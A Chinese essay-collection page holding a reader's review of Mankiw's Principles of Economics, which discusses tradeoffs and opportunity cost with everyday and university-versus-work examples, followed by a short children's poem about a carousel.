2.the cost of something is what you give up to get it.某种东西的成本是为了得到他所放弃的东西。假设我现在开始考虑是应该出去做搬运工还是去上大学，去当搬运工可以每月有1000元的收入，而上大学没有收入还要交学费。这样看来，还是当搬运工比较合算，但这是在没有计算成本之前。做搬运工是有成本的，它的成本就是因为没有去上大学而失去的一切，其中之一就是毕业后的工资收入。假设你这辈子工作30年然后退休，则做搬运工的成本是大学毕业后一辈子的收入，至少3百万元;而做搬运工的收益顶多只有它的1/3，收益减掉成本其实是亏损了2百万元的。所以，对于普通人来说，如果有机会上大学就千万别去做小工。上大学也是有成本的，它的成本不单是学费，还包括因为上学而失去的工作机会。对于不同的人来说，出去工作能赚到的钱数大不不同，因而人与人之间上大学的成本也有着天壤之别。比如说我，假如不上大学，也许就只能当搬运工，这个成本是非常低的，那当然是上大学比较合算。但比尔盖茨没有上完大学，就去开了一家软件公司并且占领pc机操作系统市场，收益相当于大约1000亿美元。这个成本实在是太大了，对于他来说显然读完大学是不合算的了。基于同样的原因，没有选择上大学的还有apple的总裁，oracle的总裁，众多的体育明星等等。金融0901班msn空间完美搬家到新浪博客!

篇11：经济学原理读后感500字

依我看来，这是一本每个人都应当读一读的好书，若你对经济学知之甚少，则尤其如此。我看的这个版本是它的第三版中文版，由梁小民翻译，分上下两册。现在最新的英文版已经是第五版了。我现在只读完了它的上册，即前十七章。我打算先暂停一段时间，看看其他的书，然后再继续学习它的下册。

我这个人是比较缺乏经济头脑的:不会赚钱、不会投资、也不会花钱。从小，周围就没有真正懂经济学的人，所以没有受到过这方面的熏陶。因而对我来说，就不是单纯看看投资一类的书就可以学会赚钱的了，需要从头开始，首先培养自己最基础的思考问题的方法。

读完这本书，果然收获不小。很多以前不是太明白的一些现象，现在都有了一些新的理解:大到国家的经济，比如，中美之间的贸易对谁有利，对谁有弊;英国当年为啥要搞圈地运动;小到个人经济，比如我的工资是如何被制定的等等。以后我会慢慢把这些想法都整理记录下来。

这本经济学原理的开篇就提出了经济学的十大原理，其后的章节都是围绕着这十大原理对各种社会经济现象进行的分析论述。在这里，我就以重新复习一遍这十个原理的方式来作为自己的读后感吧。这十大原理中的头两条不单适用于经济学领域，而是对我们所做的任何决定都适用，所以我在这里对这两条做了评论。其它条目领会得还不够深，要过些时候单独写评论。

1. People face tradeoffs. 人们面临权衡取舍。

这一条作为十大原理之首，是因为每个人即便从未学过经济也会对它有最深刻的体会。经济学中所有的问题归根结底都是由这个权衡取舍引出来的;而经济学研究的意义也正是在于帮助人们在权衡取舍中选择最优的方案。

我想大家应该都有过和我同样的体会:欲望很多，能得到满足的却很少。

鱼和熊掌不可得兼，舍鱼而取熊掌，这是一个最熟为人知的权衡取舍。而我自己也是每天面对各种权衡取舍:早饭吃包子还是油条;多花点时间工作还是多花点时间锻炼身体;平时多学计算机还多学习经济;是买房还是投资;是愁眉苦脸地计划将来的每一步路，还是干脆啥也不想又傻又开心的过日子。

2. The cost of something is what you give up to get it. 某种东西的成本是为了得到他所放弃的东西。

假设我现在开始考虑是应该出去做搬运工还是去上大学，去当搬运工可以每月有1000元的收入，而上大学没有收入还要交学费。这样看来，还是当搬运工比较合算，但这是在没有计算成本之前。做搬运工是有成本的，它的成本就是因为没有去上大学而失去的一切，其中之一就是毕业后的工资收入。假设你这辈子工作30年然后退休，则做搬运工的成本是大学毕业后一辈子的收入，至少3百万元;而做搬运工的收益顶多只有它的1/3，收益减掉成本其实是亏损了2百万元的。所以，对于普通人来说，如果有机会上大学就千万别去做小工。

上大学也是有成本的，它的成本不单是学费，还包括因为上学而失去的工作机会。对于不同的人来说，出去工作能赚到的钱数大不不同，因而人与人之间上大学的成本也有着天壤之别。比如说我，假如不上大学，也许就只能当搬运工，这个成本是非常低的，那当然是上大学比较合算。但比尔盖茨没有上完大学，就去开了一家软件公司并且占领PC机操作系统市场，收益相当于大约1000亿美元。这个成本实在是太大了，对于他来说显然读完大学是不合算的了。基于同样的原因，没有选择上大学的还有 Apple 的总裁，Oracle 的总裁，众多的体育明星等等。

在金钱方面，人与人之间是非常不平等的，贫富之间差距巨大。但有些东西人与人之间基本平等，比如生命，每个人都只有一次;比如时间，大多数现代人都拥有60——80年。

在时间与金钱之间做权衡取舍又是一个最常见的问题。时间这东西在不同的情形下，所对应的金钱是大不相同的。对于穷人来说，时间并不值钱，对于富人则正好相反;对于同一个人，时间剩得越少，越觉得它值钱。一个人在年轻的时候，做实习生，一个月有500块钱就可以乐得屁颠屁颠的;而当他即将去见上帝的时候，哪怕花5万块钱延长一天的生命，也觉得值得。

我要去城里的另一边，可以打的，也可与坐公交。也就是说，除了舒适之外，更要在50块钱和多花费在路上的一个小时的时间之间权衡取舍。对于我来说，50块钱还不是一个可以想都不去想的数字，不过我经常这样说服自己:算了，就花50块钱吧。到我快死的时候，这50块钱也许连1分钟都买不来;而现在能买来1个小时，已经很合算了。

有些权衡取舍非常容易做决定，因为成本比较低。比如是取鱼还是取熊掌。我决不会在饭桌上为这个问题多费脑筋，无论选什么，成本都不高。有些决定就难做了，比如当生和义不可得兼，取生还是取义?无论取什么，其成本都大的不可估量。

篇12：旋转木马作文

旋转木马作文

旋转木马

小小马，跑啊跑，

跑过山高中优秀作文 原创分享 作文人网，跑过海。

现在跑到哪里了？

原来还在这里呀。

本文标签： 木马原理作文500字